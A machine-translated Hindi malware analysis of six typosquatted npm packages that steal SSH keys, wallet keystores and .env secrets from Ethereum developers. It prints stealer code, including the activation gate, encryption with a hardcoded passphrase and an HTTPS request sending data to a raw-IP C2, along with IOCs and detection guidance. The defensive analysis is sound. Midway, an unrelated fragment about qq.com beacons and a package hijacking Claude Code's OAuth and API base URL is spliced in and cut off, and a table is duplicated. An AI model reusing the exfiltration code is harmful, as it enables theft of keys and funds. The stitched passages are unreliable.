TL, डॉ
6 मई, 2026 को, एक एकल एनपीएम प्रकाशक, namikazesarada010206ने एथेरियम, सॉलिडिटी और डीएफआई डेवलपर इकोसिस्टम को निशाना बनाते हुए छह दुर्भावनापूर्ण पैकेज जारी किए।
पैकेज, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, तथा web3-utils-coreउन्होंने लोकप्रिय वेब3 टूलिंग के लिए सहायक लाइब्रेरी की तरह दिखने वाले विश्वसनीय नामों का उपयोग किया।
सभी छह पैकेजों में एक ही सामग्री थी। telemetry.js फ़ाइल। यह फ़ाइल क्लस्टर में 256 SHA मान के साथ बाइट-समान थी:
यह मैलवेयर इंस्टॉल होने के समय एक्जीक्यूट नहीं होता है। preinstall or postinstall हुक। इसके बजाय, यह तब सक्रिय होता है जब पैकेज को इसके माध्यम से आयात किया जाता है। require().
वह विवरण महत्वपूर्ण है।
यह इम्प्लांट तब तक प्रतीक्षा करता है जब तक कोई डेवलपर वास्तव में पैकेज का उपयोग नहीं करता। फिर यह जाँचता है कि वर्कस्टेशन एक वास्तविक एथेरियम/सॉलिडिटी डेवलपमेंट वातावरण जैसा दिखता है या नहीं। यह एल्केमी या इन्फुरा कुंजी, निजी कुंजी, मेमोनिक्स, डिप्लॉयर कुंजी या स्थानीय फाउंड्री निर्देशिका की खोज करता है।
यदि होस्ट मेल खाता है, तो चोर SSH निजी कुंजी, Foundry / Geth / Brownie वॉलेट कीस्टोर एकत्र करता है, .env* यह फ़ाइलों और संवेदनशील पर्यावरण चरों को एन्क्रिप्ट करता है। यह हार्डकोडेड पासफ़्रेज़ का उपयोग करके AES-256-GCM के साथ बंडल को एन्क्रिप्ट करता है और TLS सत्यापन अक्षम करके इसे एक रॉ IPv4 C2 एंडपॉइंट पर भेजता है।
Xygeni के मैलवेयर अर्ली वार्निंग (MEW) सिस्टम ने सभी छह पैकेजों को दुर्भावनापूर्ण घोषित किया है। npm रजिस्ट्री टेकडाउन रिपोर्ट बंडल अभी लंबित है।
क्लस्टर: छह पैकेज, एक प्रकाशक
प्रकाशक खाता namikazesarada010206 यह लिंक एक अपुष्ट जीमेल पते से जुड़ा हुआ था। namikazesarada010206@gmail.com.
यह अभियान 6 मई, 2026 को एक ही दिन में एक साथ प्रकाशित हुआ। सभी छह पैकेजों के संस्करण इस प्रकार थे: 1.0.0इसमें रनटाइम डिपेंडेंसी शून्य थी, और इसमें केवल तीन फाइलें शामिल थीं:
package.json index.js telemetry.js उन्होंने समान स्रोत भंडार की भी घोषणा की:
https://github.com/harunosakura030303-maker/evmchain-config पहले तीन पैकेज प्रकाशन के समय ही MEW स्कैनर द्वारा पकड़ लिए गए थे। शेष तीन को प्रकाशक के npm प्रोफ़ाइल की विश्लेषक समीक्षा के बाद जबरन चिह्नित किया गया। एक बार जब समान बाइट-समान telemetry.js क्लस्टर में इसकी पुष्टि हो गई थी, और निरंतरता के आधार पर इन्हें दुर्भावनापूर्ण मानकर बंद कर दिया गया था।
| पैकेज | संस्करण | एनपीएम प्रकाशित | MEW टिकट | निर्णय |
|---|---|---|---|---|
| विएम-कोर | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | दुर्भावनापूर्ण |
| viem-utils-core | 1.0.0 | 2026-05-06 | #51050 | दुर्भावनापूर्ण |
| हार्डहैट-कोर-यूटिल्स | 1.0.0 | 2026-05-06 | #51051 | दुर्भावनापूर्ण |
| ईवीएम-यूटिल्स | 1.0.0 | 2026-05-06 | #51069 | लगातार दुर्भावनापूर्ण |
| फाउंड्री-यूटिल्स | 1.0.0 | 2026-05-06 | #51071 | लगातार दुर्भावनापूर्ण |
| वेब3-यूटिल्स-कोर | 1.0.0 | 2026-05-06 | #51070 | लगातार दुर्भावनापूर्ण |
नामकरण की रणनीति सरल लेकिन प्रभावी है।
ये पैकेज मूल नामों की हूबहू नकल नहीं करते हैं। इसके बजाय, वे संभावित "उपयोगिता" प्रत्ययों का उपयोग करते हैं जैसे कि -core, -utils, तथा -utils-coreइससे वे सहायक लाइब्रेरी की तरह दिखते हैं जिन्हें एक डेवलपर वेब3 टूलिंग के आसपास देखने की उम्मीद कर सकता है।
| दुर्भावनापूर्ण पैकेज | वैध लक्ष्य |
|---|---|
| विएम-कोर | viem, एक लोकप्रिय एथेरियम टाइपस्क्रिप्ट क्लाइंट |
| viem-utils-core | विएम |
| हार्डहैट-कोर-यूटिल्स | हार्डहैट, एक मुख्यधारा का सॉलिडिटी विकास वातावरण |
| ईवीएम-यूटिल्स | जेनेरिक ईवीएम टूलिंग नेमस्पेस |
| फाउंड्री-यूटिल्स | फाउंड्री, एक सॉलिडिटी टूलचेन |
| वेब3-यूटिल्स-कोर | web3-utils, Web3.js हेल्पर |
यह "पूरक पैकेज" का पैटर्न है: "मैं ही असली पैकेज हूं" नहीं, बल्कि "मैं असली पैकेज के आसपास एक उचित सहायक की तरह दिखता हूं।"
तेजी से आगे बढ़ रहे DeFi डेवलपर्स के लिए, यह जोखिम पैदा करने के लिए काफी है।
पैकेज आयात करने पर क्या होता है?
यह हमला श्रृंखला छोटी, सुनियोजित और क्रिप्टो-विकास परिवेशों पर केंद्रित है।
इसमें कोई इंस्टॉलेशन हुक नहीं है। इसके बजाय, प्रत्येक पैकेज में एक शामिल है। index.js जो स्टब कार्यक्षमता को निर्यात करता है और फिर दुर्भावनापूर्ण टेलीमेट्री मॉड्यूल को लोड करता है।
require('./telemetry').init(); इसका मतलब है कि मैलवेयर पहली बार आयात करने पर सक्रिय हो जाता है।
यह हमलावर के लिए परिचालन की दृष्टि से उपयोगी है। कई स्कैनर और सैंडबॉक्स इंस्टॉलेशन के समय के व्यवहार पर ध्यान केंद्रित करते हैं। यह पैकेज तब तक प्रतीक्षा करता है जब तक कि वास्तव में इसका उपयोग किसी डेवलपर, बिल्ड स्क्रिप्ट, टेस्ट सूट या रनटाइम पाथ द्वारा नहीं किया जाता है।
एक्टिवेशन गेट: केवल वास्तविक वेब3 डेवलपर वर्कस्टेशन पर ही काम करता है
इंप्लांट का सबसे महत्वपूर्ण हिस्सा एक्टिवेशन गेट है।
यह मैलवेयर एथेरियम/सॉलिडिटी डेवलपर मशीनों पर आमतौर पर पाए जाने वाले पर्यावरण चर की जांच करता है:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); यह यह भी जांचता है कि फाउंड्री स्थापित है या नहीं:
fs.existsSync(path.join(os.homedir(), '.foundry')) यदि दोनों में से कोई भी शर्त सही नहीं है, तो फ़ंक्शन वापस लौट जाता है और कुछ नहीं करता है।
इससे सामान्य विश्लेषण वातावरणों में पैकेज अधिक शांत हो जाता है। फाउंड्री, एल्केमी कुंजी, इन्फुरा कुंजी, निजी कुंजी या निमोनिक्स के बिना एक सैंडबॉक्स में आयात हानिरहित प्रतीत हो सकता है।
मिलान करने वाले होस्ट पर, मैलवेयर डेटा एकत्र करने से पहले 60 से 90 सेकंड तक प्रतीक्षा करता है:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); इस देरी से आयात और बहिर्वाह के बीच स्पष्ट संबंध कमजोर हो जाता है। .unref() यह कॉल होस्ट प्रक्रिया को सामान्य रूप से बाहर निकलने की अनुमति भी देता है यदि पैकेज को एक अल्पकालिक स्क्रिप्ट में आयात किया गया था।
यह शोर-शराबा करने वाला लूटपाट का व्यवहार नहीं है। यह एक लक्षित चोरी है जिसे तब तक चलने से बचने के लिए डिज़ाइन किया गया है जब तक कि डेवलपर वातावरण से कुछ चुराना सार्थक न हो।
चोर क्या इकट्ठा करता है
एक बार एक्टिवेशन गेट पार हो जाने के बाद, मैलवेयर उन स्रोतों से डेटा एकत्र करता है जो वेब3 डेवलपमेंट में सबसे ज्यादा मायने रखते हैं: प्राइवेट कीज़, वॉलेट कीस्टोर्स, डिप्लॉयमेंट क्रेडेंशियल्स, क्लाउड सीक्रेट्स, एनपीएम टोकन और लोकल प्रोजेक्ट कॉन्फ़िगरेशन।
| स्रोत | क्या एकत्र किया जाता है |
|---|---|
| प्रक्रिया.env | कोई भी वेरिएबल जो /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i से मेल खाता हो |
| ~/.ssh/* | प्राइवेट की या BEGIN OPENSSH वाले फ़ाइलें, जिनमें फ़ाइल की पूरी सामग्री शामिल है |
| ~/.foundry/keystores/* | फाउंड्री वॉलेट कीस्टोर फ़ाइलें |
| ~/.ethereum/keystore/* | गेथ वॉलेट कीस्टोर फ़ाइलें |
| ~/.ब्राउनी/अकाउंट्स/* | ब्राउनी वॉलेट कीस्टोर फ़ाइलें |
| ${cwd}/.env | फ़ाइल की पूरी सामग्री |
| ${cwd}/.env.local | फ़ाइल की पूरी सामग्री |
| ${cwd}/.env.production | फ़ाइल की पूरी सामग्री |
| ${cwd}/.env.development | फ़ाइल की पूरी सामग्री |
| ओएस.होस्टनाम() | होस्ट मेटाडेटा |
| क्रिप्टो.रैंडमयूयूआईडी() | पीड़ित/सत्र पहचानकर्ता |
| दिनांक.अब () | संग्रह समय स्टाम्प |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ATTA टोकन इस प्रकार हैं:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 हम यह पुष्टि नहीं कर पाए हैं कि टेलीमेट्री ऑपरेटर का अपना विश्लेषण था या एक अलग से मुद्रीकृत चैनल। हमने जिन दोनों नमूनों की जांच की, उनमें ATTA टोकन समान हैं।
क्लस्टर बी: हीबाई
claude.hk OAuth फ़िशिंग + ANTHROPIC_BASE_URL हाइजैक
1 अप्रैल को लिया गया नमूना अभियान का अधिक अपरिष्कृत और प्रारंभिक चरण है।
heibai:2.1.88-claude.hk-4 द्वारा प्रकाशित किया गया था wuguoqiangvip287 जून, 2025 को बनाया गया एक खाता। पैकेज ने वैध खाते के विरुद्ध स्वयं को स्पष्ट रूप से वर्शन किया। 2.1.88 मानवजनित मुक्ति।
यह CA-cert MITM की परवाह नहीं करता। इसके बजाय, यह OAuth एंडपॉइंट के बारे में उपयोगकर्ता से गलत जानकारी लेता है।
लीक हुए क्लाउड कोड सोर्स कोड में किए गए दुर्भावनापूर्ण बदलावों में निम्नलिखित शामिल हैं:
| स्रोत | क्या एकत्र किया जाता है |
|---|---|
| प्रक्रिया.env | कोई भी वेरिएबल जो /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i से मेल खाता हो |
| ~/.ssh/* | प्राइवेट की या BEGIN OPENSSH वाले फ़ाइलें, जिनमें फ़ाइल की पूरी सामग्री शामिल है |
| ~/.foundry/keystores/* | फाउंड्री वॉलेट कीस्टोर फ़ाइलें |
| ~/.ethereum/keystore/* | गेथ वॉलेट कीस्टोर फ़ाइलें |
| ~/.ब्राउनी/अकाउंट्स/* | ब्राउनी वॉलेट कीस्टोर फ़ाइलें |
| ${cwd}/.env | फ़ाइल की पूरी सामग्री |
| ${cwd}/.env.local | फ़ाइल की पूरी सामग्री |
| ${cwd}/.env.production | फ़ाइल की पूरी सामग्री |
| ${cwd}/.env.development | फ़ाइल की पूरी सामग्री |
| ओएस.होस्टनाम() | होस्ट मेटाडेटा |
| क्रिप्टो.रैंडमयूयूआईडी() | पीड़ित/सत्र पहचानकर्ता |
| दिनांक.अब () | संग्रह समय स्टाम्प |
लक्षित सूची अत्यंत विशिष्ट है। यह सामान्य ब्राउज़र चोरी या व्यापक क्रेडेंशियल स्क्रैपिंग नहीं है। इसका उद्देश्य एथेरियम एप्लिकेशन बनाने, परीक्षण करने, तैनात करने या संचालित करने वाले डेवलपर्स को निशाना बनाना है।
Foundry, Geth और Brownie कीस्टोर्स का समावेश विशेष रूप से महत्वपूर्ण है। ये फाइलें वॉलेट या परिनियोजन पहचान तक सीधी पहुंच प्रदान कर सकती हैं। यदि हमलावर इन्हें पासवर्ड, मेमोनिक्स या पर्यावरण रहस्यों के साथ जोड़ सकता है, तो वह धनराशि स्थानांतरित कर सकता है, परिनियोजनकर्ताओं का रूप धारण कर सकता है या स्मार्ट अनुबंध संचालन को खतरे में डाल सकता है।
डेटा लीक होने से पहले एन्क्रिप्शन
यह मैलवेयर एकत्रित डेटा को भेजने से पहले एन्क्रिप्ट कर देता है।
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); हार्डकोडेड पासफ़्रेज़ यह है:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d अंतिम पेलोड को JSON के रूप में रैप किया जाता है:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} एन्क्रिप्शन से मैलवेयर अपने आप में अधिक उन्नत नहीं हो जाता। हालांकि, इससे नेटवर्क निरीक्षण कठिन हो जाता है। निकास पर नज़र रखने वाला रक्षक JSON पेलोड तो देख लेगा, लेकिन चोरी की गई कुंजियाँ, वॉलेट फ़ाइलें या अन्य सामग्री नहीं देख पाएगा। .env हार्डकोडेड पासफ़्रेज़ और डिक्रिप्शन लॉजिक के बिना सामग्री।
रॉ आईपीवी4 सी2 में डेटा का रिसाव
डेटा निकासी का मार्ग हार्डकोड किया गया है:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); यह मैलवेयर निम्नलिखित स्थानों पर डेटा भेजता है:
https://76.13.37.80:8443/api/v1/telemetry दो बातें विशेष रूप से ध्यान आकर्षित करती हैं।
सबसे पहले, C2 एक डोमेन के बजाय एक रॉ IPv4 एड्रेस है। इससे डोमेन रजिस्ट्रेशन की आवश्यकता समाप्त हो जाती है और डोमेन-आधारित कुछ पहचानों से बचा जा सकता है।
दूसरा, TLS सत्यापन निम्न प्रकार से अक्षम किया जा सकता है:
rejectUnauthorized: false इससे मैलवेयर किसी भी प्रमाणपत्र को स्वीकार कर सकता है, जिसमें स्व-हस्ताक्षरित प्रमाणपत्र भी शामिल हैं। दूसरे शब्दों में, हमलावर को वैध सार्वजनिक प्रमाणपत्र की आवश्यकता के बिना ही एन्क्रिप्टेड डेटा प्राप्त हो जाता है।
इसमें कोई रिट्राई लॉजिक या फॉलबैक होस्ट नहीं है। त्रुटियों को चुपचाप दबा दिया जाता है। इससे C2 के ऑफलाइन या अनुपलब्ध होने पर भी पैकेज शांत रहता है।
यह अभियान क्यों महत्वपूर्ण है
डेवलपर्स को लक्षित करने वाले अधिकांश दुर्भावनापूर्ण npm पैकेज व्यापक क्रेडेंशियल्स का पीछा करते हैं: npm टोकन, AWS कुंजी, GitHub टोकन, या .npmrc फाइलें.
यह अभियान लक्षित दायरे को सीमित करता है।
यह उन संकेतों की तलाश करता है जिनसे पता चलता है कि मशीन किसी एथेरियम या सॉलिडिटी डेवलपर की है। फिर यह उस वातावरण में महत्वपूर्ण संपत्तियों को निकालता है: वॉलेट कीस्टोर, निजी कुंजी, मेमोनिक्स, डिप्लॉयर कुंजी, आदि। .env फाइलें और एसएसएच कुंजी।
इससे यह अभियान वेब3 टीमों के लिए एक सामान्य एनपीएम स्टीलर की तुलना में अधिक खतरनाक हो जाता है।
सफल संक्रमण से निम्नलिखित जोखिम उत्पन्न हो सकते हैं:
- परिनियोजन वॉलेट
- स्मार्ट कॉन्ट्रैक्ट एडमिन कुंजी
- आरपीसी प्रदाता कुंजी
- क्लाउड परिनियोजन क्रेडेंशियल
- npm प्रकाशन टोकन
- डेवलपर या बिल्ड इंफ्रास्ट्रक्चर तक SSH पहुंच
- परियोजना के गुप्त रहस्य इसमें संग्रहीत हैं
.envफ़ाइलों - Foundry, Geth, या Brownie के लिए वॉलेट कीस्टोर
पैकेज के नाम भी स्पष्ट रूप से सोशल इंजीनियरिंग को दर्शाते हैं। वे परिचित टूल नामों के माध्यम से वेब3 डेवलपर इकोसिस्टम को लक्षित करते हैं: viem, hardhat, foundry, evm, तथा web3.
अभिनेता को अपने वास्तविक प्रोजेक्ट्स से समझौता करने की आवश्यकता नहीं है। उन्हें केवल एक डेवलपर की आवश्यकता है जो एक उपयुक्त सहायक पैकेज स्थापित कर सके।
सुरक्षा उल्लंघन और पहचान के संकेतक
| पैकेज और प्रकाशक | |
|---|---|
| क्षेत्र | वैल्यू |
| एनपीएम प्रकाशक | नामिकाज़ेसरदा010206 |
| प्रकाशक का ईमेल | namikazesarada010206@gmail.com |
| ईमेल सत्यापित | नहीं |
| SCM सत्यापित | नहीं |
| प्रतिष्ठा स्कोर | 1.0 |
| संकुल | विएम-कोर, विएम-यूटिल्स-कोर, हार्डहैट-कोर-यूटिल्स, ईवीएम-यूटिल्स, फाउंड्री-यूटिल्स, वेब3-यूटिल्स-कोर |
| संस्करण | सभी 1.0.0 |
| स्रोत भंडार | https://github.com/harunosakura030303-maker/evmchain-config |
| दुर्भावनापूर्ण होने की पुष्टि हुई | सभी छह पैकेज |
| नेटवर्क | |
|---|---|
| प्रकार | वैल्यू |
| C2 एंडपॉइंट | https://76.13.37.80:8443/api/v1/telemetry |
| सी2 आईपी | 76.13.37.80 |
| C2 पोर्ट | 8443/टीसीपी |
| टीएलएस व्यवहार | अस्वीकारअनधिकृत: गलत |
| पेलोड योजना | {"v":2,"iv": ,"डी": ,"टी": } |
| फ़ाइलें और हैश | |
|---|---|
| प्रकार | वैल्यू |
| टेलीमेट्री.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| पैकेज लेआउट | package.json, index.js, telemetry.js |
| फ़ाइल गणना | 3 |
| अनुमानित कुल आकार | 3.4 KB |
सक्रियण संकेत
यह मैलवेयर इन पर्यावरण चरों की जाँच करता है:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY यह निम्नलिखित की भी जाँच करता है:
~/.foundry/ लक्षित होस्ट पथ
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development संग्रह रेगुलर एक्सप्रेशन
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i पहचान संबंधी नोट्स
कई नियम इस अभियान को पूर्ण व्यवहार विश्लेषण की आवश्यकता के बिना ही पकड़ लेते हैं।
सबसे पहले, लॉकफाइलों में छह दुर्भावनापूर्ण पैकेज नामों की जांच करें:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core किसी भी मैच में package-lock.json, yarn.lock, pnpm-lock.yamlया, node_modules इतिहास को एक गंभीर घटना के रूप में लिया जाना चाहिए।
दूसरा, Node.js प्रक्रियाओं द्वारा वॉलेट कीस्टोर पथों को पढ़ने की निगरानी करें:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ किसी सहायक निर्भरता के रूप में आयात किए गए पैकेज के लिए यह व्यवहार शायद ही कभी वैध होता है। आउटबाउंड नेटवर्क गतिविधि के बाद यह विशेष रूप से संदिग्ध हो जाता है।
तीसरा, HTTPS कनेक्शनों को ब्लॉक करें या उन पर अलर्ट जारी करें:
76.13.37.80:8443 विशेषकर जब अनुरोध पथ इस प्रकार हो:
/api/v1/telemetry चौथा, ऐसे npm पैकेज खोजें जो इन विशेषताओं को संयोजित करते हों:
- नया या कम प्रतिष्ठा वाला प्रकाशक
- अपुष्ट जीमेल खाता
- Web3 से सटे पैकेज का नाम
- कोई सार्थक भंडार इतिहास नहीं
- छोटा पैकेज लेआउट
index.jsजो टेलीमेट्री या सहायक फ़ाइल लोड करता है- कोई रनटाइम निर्भरता नहीं
- संवेदनशील पर्यावरण-चर संग्रह
- वॉलेट कीस्टोर एक्सेस
यह पैटर्न एक सिंगल आईओसी की तुलना में अधिक उपयोगी है क्योंकि अगला पैकेज आईपी एड्रेस बदल सकता है लेकिन लक्ष्यीकरण लॉजिक को समान रख सकता है।
समझौता प्रतिक्रिया चेकलिस्ट
यदि किसी डेवलपर ने छह पैकेजों में से किसी एक का उपयोग किया है और उनका वातावरण सक्रियण सीमा से मेल खाता है, तो वर्कस्टेशन को असुरक्षित मानें।
इसमें वे मशीनें शामिल हैं जिनमें फाउंड्री स्थापित है, वातावरण में एल्केमी या इन्फुरा कुंजी, निजी कुंजी, मेमोनिक्स या परिनियोजन कुंजी मौजूद हैं।
अनुशंसित प्रतिक्रिया:
- होस्ट को नेटवर्क से डिस्कनेक्ट करें।
- रक्षित
node_modulesलॉकफाइलें, शेल हिस्ट्री और फोरेंसिक विश्लेषण के लिए प्रासंगिक लॉग। - नीचे दिए गए प्रत्येक SSH कुंजीजोड़ी को घुमाएँ
~/.ssh/. - प्रत्येक कीस्टोर के लिए वॉलेट की चाबियों को घुमाएँ
~/.foundry,~/.ethereum, तथा~/.brownie. - धनराशि को नए वॉलेट में स्थानांतरित करें।
- संग्रहीत प्रत्येक रहस्य को घुमाएँ
.env*डेवलपर द्वारा काम किए गए रिपॉजिटरी में मौजूद फाइलें। - संग्रह रेगुलर एक्सप्रेशन से मेल खाने वाले पर्यावरण रहस्यों को घुमाएँ, जिनमें AWS कुंजी, npm टोकन, परिनियोजन टोकन, API कुंजी, निजी कुंजी, सीड और मेमोनिक्स शामिल हैं।
- पैकेज की स्थापना के बाद से क्लाउड, एनपीएम, गिटहब, आरपीसी प्रदाता और ब्लॉकचेन गतिविधि का ऑडिट करें।
- पुनः उपयोग करने से पहले वर्कस्टेशन को री-इमेज करें।
बचाव पक्ष के खिलाड़ियों को क्या सीख लेनी चाहिए
यह अभियान दर्शाता है कि उच्च-मूल्य वाले डेवलपर इकोसिस्टम के आसपास npm typosquatting किस प्रकार विकसित हो रहा है।
अभिनेता को दृढ़ता की आवश्यकता नहीं थी। उन्हें अस्पष्टीकरण की आवश्यकता नहीं थी। उन्हें इंस्टॉलेशन के समय निष्पादन की भी आवश्यकता नहीं थी।
इसके बजाय, उन्होंने तीन चीजों पर भरोसा किया:
- संभावित वेब3 पैकेज नाम
- केवल वास्तविक क्रिप्टो-विकास मशीनों पर ही सक्रियण।
- एथेरियम डेवलपर्स के लिए सबसे महत्वपूर्ण फाइलों और रहस्यों की सीधी चोरी
इस वजह से व्यापक जांच के दौरान अभियान को नजरअंदाज करना आसान हो जाता है और सही माहौल में पहुंचने पर यह खतरनाक साबित होता है।
वेब3 टीमों के लिए सबक स्पष्ट है: निर्भरता नामों को अपने खतरे के मॉडल के हिस्से के रूप में मानें। एक पैकेज जो हानिरहित सहायक की तरह दिखता है, वह भी वॉलेट की सुरक्षा में सेंध लगाने का सबसे छोटा रास्ता बन सकता है।
इसकी सूचना npm रजिस्ट्री को दे दी गई है। प्रकाशक खाता और पैकेज हटा दिए जाने पर हम इस पोस्ट को अपडेट करेंगे।




